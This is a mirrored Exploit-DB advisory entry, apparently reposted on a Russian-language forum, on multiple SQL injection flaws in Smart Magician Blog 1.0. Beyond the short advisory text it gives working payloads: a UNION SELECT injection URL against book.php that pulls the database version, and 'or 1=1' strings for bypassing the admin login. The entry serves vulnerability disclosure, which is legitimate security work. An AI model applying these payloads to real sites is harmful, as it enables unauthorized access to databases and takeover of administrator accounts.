- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 34689
- Проверка EDB
-
- Пройдено
- Автор
- EVIL-COD3R
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2009-08-27
Smart Magician Blog 1.0 - Multiple SQL Injections
Код:
source: https://www.securityfocus.com/bid/43376/info
Smart Magician Blog is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Smart Magician Blog 1.0 is vulnerable; other versions may be affected.
http://www.example.com/path/book.php?do=show&ids=-1 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13--
The following data is available:
admin First : 'or 1=1 or ' & or & 'or 1=1/*
- Источник
- www.exploit-db.com